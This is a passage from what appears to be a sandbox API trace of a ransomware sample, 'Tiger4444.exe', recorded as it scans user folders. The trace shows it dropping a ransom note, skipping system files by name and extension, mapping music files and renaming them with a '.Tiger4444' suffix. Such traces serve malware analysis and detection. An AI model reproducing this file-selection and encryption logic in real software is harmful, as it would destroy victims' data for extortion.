(lpString=".lnk") returned 4 [0045.765] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0045.765] lstrlenW (lpString=".ini") returned 4 [0045.765] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0045.765] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0045.765] FindClose (in: hFindFile=0xc72f08 | out: hFindFile=0xc72f08) returned 1 [0045.765] lstrcpyW (in: lpString1=0x30aeaf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.765] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.767] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.767] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.767] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.767] CloseHandle (hObject=0x260) returned 1 [0045.767] CloseHandle (hObject=0x2ac) returned 1 [0045.768] GetCurrentThreadId () returned 0xfa8 [0045.768] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0045.768] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\OneDrive", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\OneDrive") returned="C:\\Users\\FD1HVy\\OneDrive" [0045.768] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72ec8 | out: hHeap=0xc50000) returned 1 [0045.768] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0045.768] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\OneDrive" | out: lpString1="C:\\Users\\FD1HVy\\OneDrive") returned="C:\\Users\\FD1HVy\\OneDrive" [0045.768] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\OneDrive", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\OneDrive\\") returned="C:\\Users\\FD1HVy\\OneDrive\\" [0045.768] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\OneDrive\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\OneDrive\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\OneDrive\\.BFC0E91B00AE8A0620D3" [0045.768] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\OneDrive\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\onedrive\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.769] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.772] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.773] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\OneDrive\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.773] CloseHandle (hObject=0x2ac) returned 1 [0045.774] lstrlenW (lpString="C:\\Users\\FD1HVy\\OneDrive") returned 24 [0045.774] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.774] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\OneDrive\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x804c901c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f08 [0045.774] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.774] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.774] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.774] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.774] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x804c901c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.774] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.774] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.774] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.774] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.774] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.774] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x804c901c, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x804c901c, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x804c901c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.774] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.774] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.774] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f0f0bc5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x93ef127a, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x61, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.774] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.774] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.774] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0045.774] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0045.774] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0045.775] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0045.775] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0045.775] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0045.775] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0045.775] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0045.775] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0045.775] lstrcpyW (in: lpString1=0x30aeada, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0045.775] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\OneDrive\\desktop.ini", dwFileAttributes=0x2) returned 1 [0045.775] lstrlenW (lpString="desktop.ini") returned 11 [0045.775] lstrlenW (lpString="Tiger4444") returned 9 [0045.775] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0045.775] lstrlenW (lpString=".dll") returned 4 [0045.775] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0045.775] lstrlenW (lpString=".lnk") returned 4 [0045.775] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0045.775] lstrlenW (lpString=".ini") returned 4 [0045.775] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0045.775] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f0f0bc5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x93ef127a, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x61, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0045.775] FindClose (in: hFindFile=0xc72f08 | out: hFindFile=0xc72f08) returned 1 [0045.775] lstrcpyW (in: lpString1=0x30aeada, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.775] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\OneDrive\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\onedrive\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.776] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.776] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.776] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.776] CloseHandle (hObject=0x260) returned 1 [0045.804] CloseHandle (hObject=0x2ac) returned 1 [0045.805] GetCurrentThreadId () returned 0xfa8 [0045.805] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66548 [0045.805] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Music", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0045.805] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc676e8 | out: hHeap=0xc50000) returned 1 [0045.805] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66540 | out: hHeap=0xc50000) returned 1 [0045.805] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music" | out: lpString1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0045.805] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0045.805] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\.BFC0E91B00AE8A0620D3" [0045.805] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.806] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.809] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.810] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.811] CloseHandle (hObject=0x2ac) returned 1 [0045.811] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music") returned 21 [0045.811] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.811] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x68519f55, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x805156ca, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0045.811] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.811] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.811] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.811] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.811] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x68519f55, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x805156ca, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.811] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.811] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.811] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.811] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.812] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.812] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x805156ca, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x805156ca, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8053b8c7, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.812] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.812] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.812] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb7eaba0, ftCreationTime.dwHighDateTime=0x1d4c77c, ftLastAccessTime.dwLowDateTime=0x69dd0d70, ftLastAccessTime.dwHighDateTime=0x1d4c5a4, ftLastWriteTime.dwLowDateTime=0x69dd0d70, ftLastWriteTime.dwHighDateTime=0x1d4c5a4, nFileSizeHigh=0x0, nFileSizeLow=0xc053, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="14B5f5HX.m4a", cAlternateFileName="")) returned 1 [0045.812] lstrcmpiW (lpString1="14B5f5HX.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.812] lstrcmpiW (lpString1="14B5f5HX.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.812] lstrcmpiW (lpString1="14B5f5HX.m4a", lpString2="Tiger4444.exe") returned -1 [0045.812] lstrcmpiW (lpString1="14B5f5HX.m4a", lpString2=".") returned 1 [0045.812] lstrcmpiW (lpString1="14B5f5HX.m4a", lpString2="..") returned 1 [0045.812] lstrcmpiW (lpString1="14B5f5HX.m4a", lpString2="windows") returned -1 [0045.812] lstrcmpiW (lpString1="14B5f5HX.m4a", lpString2="bootmgr") returned -1 [0045.812] lstrcmpiW (lpString1="14B5f5HX.m4a", lpString2="pagefile.sys") returned -1 [0045.812] lstrcmpiW (lpString1="14B5f5HX.m4a", lpString2="boot") returned -1 [0045.812] lstrcmpiW (lpString1="14B5f5HX.m4a", lpString2="ids.txt") returned -1 [0045.812] lstrcmpiW (lpString1="14B5f5HX.m4a", lpString2="NTUSER.DAT") returned -1 [0045.812] lstrcpyW (in: lpString1=0x30aead4, lpString2="14B5f5HX.m4a" | out: lpString1="14B5f5HX.m4a") returned="14B5f5HX.m4a" [0045.812] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\14B5f5HX.m4a", dwFileAttributes=0x0) returned 1 [0045.812] lstrlenW (lpString="14B5f5HX.m4a") returned 12 [0045.812] lstrlenW (lpString="Tiger4444") returned 9 [0045.812] lstrcmpiW (lpString1="5f5HX.m4a", lpString2="Tiger4444") returned -1 [0045.812] lstrlenW (lpString=".dll") returned 4 [0045.812] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0045.812] lstrlenW (lpString=".lnk") returned 4 [0045.812] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0045.812] lstrlenW (lpString=".ini") returned 4 [0045.812] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0045.812] lstrlenW (lpString=".sys") returned 4 [0045.812] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0045.813] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\14B5f5HX.m4a" (normalized: "c:\\users\\fd1hvy\\music\\14b5f5hx.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.813] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.813] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13726577538) returned 1 [0045.813] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=49235) returned 1 [0045.813] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0045.813] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0045.813] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc360, lpName=0x0) returned 0x2c8 [0045.813] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc360) returned 0xbe0000 [0045.814] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.814] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0045.814] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.814] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0045.814] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.814] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0045.814] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.814] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0045.814] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13726753607) returned 1 [0045.814] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0045.815] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0045.815] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.815] CloseHandle (hObject=0x2c8) returned 1 [0045.815] CloseHandle (hObject=0x260) returned 1 [0045.817] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\14B5f5HX.m4a.Tiger4444") returned 44 [0045.817] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\14B5f5HX.m4a" (normalized: "c:\\users\\fd1hvy\\music\\14b5f5hx.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\14B5f5HX.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\14b5f5hx.m4a.tiger4444"), dwFlags=0x1) returned 1 [0045.817] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=49248 | out: Addend=0xc6f980) returned 18555312 [0045.817] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4537 [0045.817] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.817] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.817] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.817] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0045.817] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0045.817] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0045.817] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0045.817] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0045.817] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0045.818] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0045.818] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0045.818] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0045.818] lstrcpyW (in: lpString1=0x30aead4, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0045.818] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", dwFileAttributes=0x22) returned 1 [0045.818] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", dwFileAttributes=0x6) returned 1 [0045.818] lstrlenW (lpString="desktop.ini") returned 11 [0045.818] lstrlenW (lpString="Tiger4444") returned 9 [0045.818] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0045.818] lstrlenW (lpString=".dll") returned 4 [0045.818] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0045.818] lstrlenW (lpString=".lnk") returned 4 [0045.818] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0045.818] lstrlenW (lpString=".ini") returned 4 [0045.818] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0045.818] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc808ac50, ftCreationTime.dwHighDateTime=0x1d4c8e3, ftLastAccessTime.dwLowDateTime=0x1439ad10, ftLastAccessTime.dwHighDateTime=0x1d4ca22, ftLastWriteTime.dwLowDateTime=0x1439ad10, ftLastWriteTime.dwHighDateTime=0x1d4ca22, nFileSizeHigh=0x0, nFileSizeLow=0xc2df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="epqIgxA0WzcL_N3FRi.m4a", cAlternateFileName="EPQIGX~1.M4A")) returned 1 [0045.818] lstrcmpiW (lpString1="epqIgxA0WzcL_N3FRi.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.818] lstrcmpiW (lpString1="epqIgxA0WzcL_N3FRi.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.818] lstrcmpiW (lpString1="epqIgxA0WzcL_N3FRi.m4a", lpString2="Tiger4444.exe") returned -1 [0045.818] lstrcmpiW (lpString1="epqIgxA0WzcL_N3FRi.m4a", lpString2=".") returned 1 [0045.818] lstrcmpiW (lpString1="epqIgxA0WzcL_N3FRi.m4a", lpString2="..") returned 1 [0045.818] lstrcmpiW (lpString1="epqIgxA0WzcL_N3FRi.m4a", lpString2="windows") returned -1 [0045.818] lstrcmpiW (lpString1="epqIgxA0WzcL_N3FRi.m4a", lpString2="bootmgr") returned 1 [0045.818] lstrcmpiW (lpString1="epqIgxA0WzcL_N3FRi.m4a", lpString2="pagefile.sys") returned -1 [0045.819] lstrcmpiW (lpString1="epqIgxA0WzcL_N3FRi.m4a", lpString2="boot") returned 1 [0045.819] lstrcmpiW (lpString1="epqIgxA0WzcL_N3FRi.m4a", lpString2="ids.txt") returned -1 [0045.819] lstrcmpiW (lpString1="epqIgxA0WzcL_N3FRi.m4a", lpString2="NTUSER.DAT") returned -1 [0045.819] lstrcpyW (in: lpString1=0x30aead4, lpString2="epqIgxA0WzcL_N3FRi.m4a" | out: lpString1="epqIgxA0WzcL_N3FRi.m4a") returned="epqIgxA0WzcL_N3FRi.m4a" [0045.819] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\epqIgxA0WzcL_N3FRi.m4a", dwFileAttributes=0x0) returned 1 [0045.819] lstrlenW (lpString="epqIgxA0WzcL_N3FRi.m4a") returned 22 [0045.819] lstrlenW (lpString="Tiger4444") returned 9 [0045.819] lstrcmpiW (lpString1="N3FRi.m4a", lpString2="Tiger4444") returned -1 [0045.819] lstrlenW (lpString=".dll") returned 4 [0045.819] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0045.819] lstrlenW (lpString=".lnk") returned 4 [0045.819] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0045.819] lstrlenW (lpString=".ini") returned 4 [0045.819] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0045.819] lstrlenW (lpString=".sys") returned 4 [0045.819] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0045.819] CreateFileW 